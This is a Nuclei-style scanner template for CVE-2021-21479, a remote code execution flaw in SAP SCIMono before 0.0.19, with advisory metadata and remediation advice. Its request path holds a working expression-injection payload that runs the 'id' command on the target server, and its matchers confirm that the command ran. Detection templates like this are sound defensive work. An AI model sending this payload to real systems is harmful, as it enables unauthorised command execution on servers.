id: CVE-2021-21479 info: name: SCIMono <0.0.19 - Remote Code Execution author: dwisiswant0 severity: critical description: | SCIMono before 0.0.19 is vulnerable to remote code execution because it is possible for an attacker to inject and execute java expressions and compromise the availability and integrity of the system. remediation: | Upgrade SCIMono to version 0.0.19 or later to mitigate this vulnerability. reference: - https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/ - https://nvd.nist.gov/vuln/detail/CVE-2021-21479 - https://github.com/SAP/scimono/security/advisories/GHSA-29q4-gxjq-rx5c classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H cvss-score: 9.1 cve-id: CVE-2021-21479 cwe-id: CWE-74 epss-score: 0.0027 epss-percentile: 0.64274 cpe: cpe:2.3:a:sap:scimono:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sap product: scimono tags: cve,cve2021,scimono,rce http: - method: GET path: - "{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D" matchers: - type: word part: body words: - "The attribute value" - "java.lang.UNIXProcess@" - "has invalid value!" - '"status" : "400"' condition: and # digest: 4a0a00473045022057b89677847f38e541ae054fd8320c72a034b4cd97b7517b2898cfd077ae58460221009b19329987f12f150b35a30a28ca031c7cc6684660f79bf9f8affb2f6ba07245:922c64590222798bb761d5b6d8e72950